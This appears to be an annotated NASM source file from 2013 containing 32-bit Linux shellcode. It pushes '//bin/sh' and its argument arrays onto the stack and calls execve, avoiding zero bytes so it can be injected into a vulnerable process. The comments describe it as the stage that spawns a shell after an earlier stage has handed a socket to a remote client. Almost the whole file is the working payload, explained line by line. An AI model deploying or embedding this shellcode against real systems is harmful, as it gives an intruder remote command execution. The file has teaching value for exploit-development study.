; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program.  If not, see <http://www.gnu.org/licenses/>.

; Filename: execve-stack.nasm
; Author: Andrey Arapov
; 2013 March
;
; Purpose: 32-bit Linux (i386) stage that builds the three execve
; arguments on the stack and issues the execve system call for
; "//bin/sh" with argv = { "//bin/sh", NULL } and envp = { NULL }.
; No data section is used: the 8-byte path is pushed as two dword
; immediates, and registers are zeroed with xor / loaded through AL so
; the instruction encoding contains no zero bytes.
; The author's note below says this runs after a preceding stage (not
; part of this file) has forwarded sockfd to a client.

global _start

section .text

_start:

; ================================ EXECVE ====================================
;
; Now as we forwarded sockfd to a client, we can spawn shell.
; Prepare the path, in little-endian, using the Python
;   >>> '//bin/sh'[::-1].encode('hex')
;   '68732f6e69622f2f'
; '//bin/sh' (doubled slash) is used instead of '/bin/sh' so the path is
; exactly 8 bytes and fills two dwords without padding; repeated slashes
; resolve the same as a single slash.
;
; int execve(const char *filename, char *const argv[], char *const envp[]);
;             EAX         EBX               ECX                   EDX
;             11        '//bin/sh'    PTR to {EBX, NULL}     PTR to {NULL}
;

; EAX: syscall number
xor eax, eax
mov al, 11              ; __NR_execve = 11 (asm/unistd_32.h); EAX is not
                        ; modified again before int 0x80

; EBX: pointer to the NUL-terminated path string
xor edx, edx            ; EDX = 0; reused as the NULL for every terminator below
push edx                ; NULL termination of '//bin/sh' string
push 0x68732f6e         ; "n/sh" - upper half of '//bin/sh', pushed first (little-endian)
push 0x69622f2f         ; "//bi" - beginning of '//bin/sh' string is here
mov ebx, esp            ; EBX -> "//bin/sh\0"

; ECX: argv = { pointer to '//bin/sh', NULL }
push edx                ; argv[1] = NULL (end of array)
push ebx                ; argv[0] = address of '//bin/sh'
mov ecx, esp            ; ECX -> argv

; EDX: envp = { NULL }  (empty environment)
push edx                ; envp[0] = NULL
mov edx, esp            ; EDX -> envp

int 0x80                ; execve(); does not return on success

; ================================ EXIT(0) ===================================
; void _exit(int status);
; /usr/include/asm/unistd_32.h:#define __NR_exit 1
;
; Reached only when execve fails (the kernel leaves a negative errno in
; EAX and execution falls through).  The status is hard-wired to 0, so
; a failed execve is indistinguishable from a clean exit to the parent.
xor eax, eax            ; EAX = 0
mov al, 1               ; EAX = 1: exit syscall
xor ebx, ebx            ; EBX = 0: success status
int 0x80

;section .data